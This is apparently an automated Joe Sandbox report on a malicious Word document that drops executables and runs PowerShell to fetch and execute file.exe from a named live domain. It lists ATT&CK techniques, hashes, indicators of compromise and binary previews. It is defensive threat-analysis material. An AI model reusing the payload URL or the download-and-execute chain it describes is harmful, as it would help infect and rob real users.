Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_004033B3

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Command and Scripting Interpreter		Path Interception1
Access Token Manipulation		1
Masquerading		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts2
Scripting		Boot or Logon Initialization Scripts111
Process Injection		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Clipboard Data		Exfiltration Over Bluetooth2
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Native API		Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Shared Modules		Logon Script (Mac)Logon Script (Mac)1
Access Token Manipulation		NTDS1
Remote System Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer13
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud Accounts33
Exploitation for Client Execution		Network Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets3
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable Media3
PowerShell		Rc.commonRc.common1
Deobfuscate/Decode Files or Information		Cached Domain Credentials114
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Scripting		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Obfuscated Files or Information		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 829399 Sample: TEPO0015922.doc Startdate: 18/03/2023 Architecture: WINDOWS Score: 100 60 Malicious sample detected (through community Yara rule) 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 Document exploit detected (drops PE files) 2->64 66 5 other signatures 2->66 7 WINWORD.EXE 302 51 2->7         started        process3 dnsIp4 58 thekaribacruisecompany.com 149.102.154.62, 443, 49171, 49172 COGENT-174US United States 7->58 50 C:\Users\user\AppData\Local\...\file[1].exe, PE32 7->50 dropped 52 C:\Users\user\AppData\...\FZdtfhgYgeghD  .scT, data 7->52 dropped 54 C:\Users\user\AppData\Local\...\8A92D3FF.png, 370 7->54 dropped 72 Document exploit detected (creates forbidden files) 7->72 74 Microsoft Office creates scripting files 7->74 12 cmd.exe 7->12         started        15 cmd.exe 7->15         started        17 cmd.exe 7->17         started        19 5 other processes 7->19 file5 signatures6 process7 signatures8 76 Suspicious powershell command line found 12->76 78 Tries to download and execute files (via powershell) 12->78 80 Bypasses PowerShell execution policy 12->80 21 powershell.exe 12 7 12->21         started        26 powershell.exe 15->26         started        28 powershell.exe 17->28         started        82 Injects files into Windows application 19->82 30 file.exe 1 57 19->30         started        32 file.exe 35 19->32         started        34 file.exe 35 19->34         started        process9 dnsIp10 56 thekaribacruisecompany.com 21->56 36 C:\Users\user\AppData\Roaming\file.exe, PE32 21->36 dropped 68 Powershell drops PE file 21->68 38 C:\Users\user\...\libgdk_pixbuf-2.0-0.dll, PE32+ 30->38 dropped 40 C:\Users\user\AppData\...\httputility.dll, PE32+ 30->40 dropped 42 C:\Users\user\AppData\...\ZedGraph.dll, PE32 30->42 dropped 44 C:\Users\user\AppData\Local\...\System.dll, PE32 30->44 dropped 70 Tries to detect virtualization through RDTSC time measurements 30->70 46 C:\Users\user\AppData\Local\...\System.dll, PE32 32->46 dropped 48 C:\Users\user\AppData\Local\...\System.dll, PE32 34->48 dropped file11 signatures12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
TEPO0015922.doc23%ReversingLabsScript.Trojan.Woreflint
TEPO0015922.doc42%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe6%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\file.exe6%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
9.0.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
21.0.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
6.2.powershell.exe.36dfce5.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
16.2.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
21.2.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
16.0.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
9.2.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

Domains

SourceDetectionScannerLabelLink
thekaribacruisecompany.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
httPs://thekaribacruisecompany.c0%Avira URL Cloudsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://thekaribacruisecompany.com0%Avira URL Cloudsafe
httPs://thekaribacruisecompany.com/file.exePE0%Avira URL Cloudsafe
httPs://thekaribacruisecompany.com/file.exePEQ0%Avira URL Cloudsafe
httPs://thekaribacruisecompany.com/file.exe0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
thekaribacruisecompany.com
149.102.154.62
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://thekaribacruisecompany.com/file.exefalse
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    httPs://thekaribacruisecompany.cpowershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://nsis.sf.net/NSIS_Errorfile.exe, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpfalse
      		high
      http://crl.entrust.net/server1.crl0powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://ocsp.entrust.net03powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        httPs://thekaribacruisecompany.com/file.exePEpowershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        httPs://thekaribacruisecompany.com/file.exePEQpowershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        httPs://thekaribacruisecompany.com/file.exepowershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://www.piriform.com/ccleanerpowershell.exe, 0000000C.00000002.925602681.00000000001B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://thekaribacruisecompany.compowershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://nsis.sf.net/NSIS_ErrorErrorfile.exe, 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000009.00000000.921928467.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpfalse
            		high
            http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.piriform.com/Ygpowershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://secure.comodo.com/CPS0powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  149.102.154.62
                  		thekaribacruisecompany.comUnited States
                  		174COGENT-174UStrue

                  General Information

                  Joe Sandbox Version:37.0.0 Beryl
                  Analysis ID:829399
                  Start date and time:2023-03-18 05:34:14 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 11m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:25
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:TEPO0015922.doc
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winDOC@29/33@2/1
                  EGA Information:
                  • Successful, ratio: 75%
                  HDC Information:
                  • Successful, ratio: 75.9% (good quality ratio 74.7%)
                  • Quality average: 87.8%
                  • Quality standard deviation: 20.7%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 96
                  • Number of non-executed functions: 58
                  Cookbook Comments:
                  • Found application associated with file extension: .doc
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                  • Execution Graph export aborted for target powershell.exe, PID 264 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  05:34:20API Interceptor48x Sleep call for process: powershell.exe modified
                  05:34:27API Interceptor824x Sleep call for process: file.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  COGENT-174USParalysis.x86_64.elfGet hashmaliciousMiraiBrowse
                  • 38.127.102.245
                  jew.x86.elfGet hashmaliciousMiraiBrowse
                  • 38.213.52.173
                  uz228WrlRm.elfGet hashmaliciousMiraiBrowse
                  • 149.50.241.156
                  loligang.arm7.elfGet hashmaliciousMiraiBrowse
                  • 154.26.250.65
                  loligang.arm.elfGet hashmaliciousMiraiBrowse
                  • 206.185.102.116
                  lOVWBcdPyr.elfGet hashmaliciousMirai, MoobotBrowse
                  • 148.254.19.37
                  MSObMZB4a6.elfGet hashmaliciousMirai, MoobotBrowse
                  • 154.6.95.209
                  8FEd8L4zBE.exeGet hashmaliciousGhostRat, NitolBrowse
                  • 206.233.132.92
                  w7ueE3vOd5.exeGet hashmaliciousGhostRat, NitolBrowse
                  • 206.233.132.92
                  rGumAsiwBj.elfGet hashmaliciousMirai, MoobotBrowse
                  • 206.235.183.223
                  Z0ZpvNkW6R.elfGet hashmaliciousMiraiBrowse
                  • 149.110.48.58
                  2HZagEp1Bi.elfGet hashmaliciousMirai, MoobotBrowse
                  • 38.5.239.207
                  https://calendar.powwows.com/events/denver-march-pow-wow/Get hashmaliciousUnknownBrowse
                  • 38.91.45.7
                  DHLIN00178.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 38.163.2.19
                  xd.x86.elfGet hashmaliciousMiraiBrowse
                  • 149.120.92.18
                  xd.arm7.elfGet hashmaliciousMiraiBrowse
                  • 38.25.126.1
                  VGm0FoCHo4.elfGet hashmaliciousMiraiBrowse
                  • 154.62.198.17
                  BFgg8MBpvo.elfGet hashmaliciousMiraiBrowse
                  • 154.31.184.180
                  linux_amd64.elfGet hashmaliciousKaijiBrowse
                  • 38.25.88.73
                  JWlERSL7xv.elfGet hashmaliciousMiraiBrowse
                  • 38.253.2.145

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  05af1f5ca1b87cc9cc9b25185115607d#Ud611#Uc758_#Uc774#Ud63c_#Uc758#Uc0ac_#Ud655#Uc778_#Uc2e0#Uccad#Uc11c.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  #Ud611#Uc758_#Uc774#Ud63c_#Uc758#Uc0ac_#Ud655#Uc778_#Uc2e0#Uccad#Uc11c.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  PO-47564647364845.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  Doc_00001364563.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  Doc_00001364563.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  Doc_35648564845.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  ID_Credit_card_Details.docx.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  form.docGet hashmaliciousEmotetBrowse
                  • 149.102.154.62
                  Buchung_fur_Flitterwochen.docx.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  autorizacion_de_pago.docx.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  Servipag_Devolucion.cmdGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  Document authorization.docx.docGet hashmaliciousHTMLPhisherBrowse
                  • 149.102.154.62
                  bank report for declined transaction.xlsxGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  CONSTRUCTION DIAGRAM 2023 - Copy.docx.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  nEaZ5OqsT6.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  o448VH3kaB.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  P1.docx.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  detallesXparaXreservar.docx.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  ayHElJfAcU.docxGet hashmaliciousUnknownBrowse
                  • 149.102.154.62
                  Card & Booking Details.docx.docGet hashmaliciousUnknownBrowse
                  • 149.102.154.62

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dllRoyalistic.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                    Royalistic.exeGet hashmaliciousGuLoaderBrowse
                      Annexationist.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        Annexationist.exeGet hashmaliciousGuLoaderBrowse
                          file.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            file.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              file.exeGet hashmaliciousGuLoaderBrowse
                                file.exeGet hashmaliciousGuLoaderBrowse
                                  file.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    file.exeGet hashmaliciousGuLoaderBrowse
                                      REQUEST_FOR_QUOTE.exeGet hashmaliciousGuLoaderBrowse
                                        REQUEST_FOR_QUOTE.exeGet hashmaliciousGuLoaderBrowse
                                          oOEAcj2CRw.exeGet hashmaliciousGuLoaderBrowse
                                            oOEAcj2CRw.exeGet hashmaliciousGuLoaderBrowse
                                              P8plQXLs5a.exeGet hashmaliciousGuLoaderBrowse
                                                P8plQXLs5a.exeGet hashmaliciousGuLoaderBrowse
                                                  HFFIFAnqTY.exeGet hashmaliciousGuLoaderBrowse
                                                    HFFIFAnqTY.exeGet hashmaliciousGuLoaderBrowse
                                                      NEWORDER.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        NEWORDER.EXE.exeGet hashmaliciousGuLoaderBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):676320
                                                          Entropy (8bit):7.876330435838718
                                                          Encrypted:false
                                                          SSDEEP:12288:8mNV/R3qdeJpAQxZg2ZE0PU4vPDC+0BOh8ybWIJQ3P0tX8glVk+4uWFG49:8mNV/RadXcvZ72PGX8g0uWA49
                                                          MD5:A1AFEF77EEC567ADB1076E8679AF207B
                                                          SHA1:842A3650C51486F329A4079CA4B62AE5542A8C98
                                                          SHA-256:2219616AFA29DD45A0B8926C8D840C5168F3B9E14A14F7569EA70EA8F5ACAA79
                                                          SHA-512:8DAFDDABA28D56F80B09545068A9A292A0D6E8C21D1D8CA0395B3AA113C467C4134A1781D62D78BA541AECF519DADA47F46D39EB59BF41B3B9366A3659027253
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe, Author: Florian Roth (Nextron Systems)
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 6%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....Oa.................f....... ...3............@..................................)....@.................................D........p..H............9..@............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...@...0...........................rsrc...H....p......................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DD35DF4.wmf

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Windows metafile
                                                          Category:dropped
                                                          Size (bytes):3712
                                                          Entropy (8bit):5.038804771790638
                                                          Encrypted:false
                                                          SSDEEP:48:PZk/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1f8:Rk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DE
                                                          MD5:4D808394C1EEFE8BB33A88A06C27401A
                                                          SHA1:E7E85FAC534EB92A90047CEAA4FBA4D0BB2FB761
                                                          SHA-256:588A5724964EDC5765F224738AD5AE3FE39D8F67DF7C3990013739808663A396
                                                          SHA-512:499AA1814D8E9E4982EBE52063786EDBCB924C587045844638F2C61FEED4900A321F8C6E166A76FBEACC5AAA4ABAA8B925523DE5EF1FDD8A7C9323B7D52D517E
                                                          Malicious:false
                                                          Preview:......@.....!.....................5...........................Segoe UI....C.......@...............-...........................A..... . ..... . ...6.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...6.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A92D3FF.png

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:370 sysV pure executable
                                                          Category:dropped
                                                          Size (bytes):262160
                                                          Entropy (8bit):0.03833554348224308
                                                          Encrypted:false
                                                          SSDEEP:12:IyQ3fvTmeCEG+b2+f3TE/lfuNH1RCZK4vFQyfulTa5Pw1ETgobVOI7lP1g6UKK4N:7e8+S+f3CsHT8v5GIw1Ew2sEr10+
                                                          MD5:8844F30E839A1EFB15EF793ADF3FAADB
                                                          SHA1:63C9886F6646A18F84551260C802A23EA5EA59C6
                                                          SHA-256:353497E0866CB4835118DF6240847822FDEBBFD6F91A54385CD8C91C923927BF
                                                          SHA-512:3F57407F8B80C80022CBF11C023C1A42C56C2B03F57F87BF342DF19D624249E1C9DB82DC52791B3C1DAEA541884935B20615645FC2976448BE123D37D231A6D4
                                                          Malicious:false
                                                          Preview:X.:.....`.c....../......xt......HV.......d..............0.].......@@......b.......^.............................................................................@.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2...........................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):72192
                                                          Entropy (8bit):5.409452390606404
                                                          Encrypted:false
                                                          SSDEEP:1536:jjzaoaDabaRaOa2EV1/pfw8jzaoaDabaRaOa2EV1/pb4M:jjzaoaDabaRaOa2yhpbjzaoaDabaRaOE
                                                          MD5:19AEC7C9E1A6F87D33460B38D45598C1
                                                          SHA1:29A61AFAA40A1D73C86C2C8B8F45129FB53ADD46
                                                          SHA-256:77AE5958D01783AD2EA852528C06B3990170E2BE2CC56C4E3B6BA6DA1F794F2A
                                                          SHA-512:63011FE4D636EE50FE5549F8728CC2DF6B91325B7D42D10A1B79492C3F9FA26FA11B19EECD5A4161F168ACBA5E301A50864B85056F517D252B0CC9D3228F2EF7
                                                          Malicious:false
                                                          Preview:......................>.......................................................~...........................................................................................................................................................................................................................................................................................................................................................................................................................................................<...;........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......=...>...C...?...@...A...B...F...D...E...G...........I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CDF61019-DC02-4D7F-85CF-609F74BFDBD2}.tmp

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44610
                                                          Entropy (8bit):2.915845583250266
                                                          Encrypted:false
                                                          SSDEEP:768:jH/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:LFia0Dqeb0nstw29rVzWSgm58F
                                                          MD5:DD4D5630ACAED2C14DBBFEF135337A90
                                                          SHA1:F9CF009C0D71D59B8E976F3CB9FF8C58DB65C777
                                                          SHA-256:15C024ACB0117A71C3A5FA9C0D4CB47C15B1724C868340290561E242CCAACABE
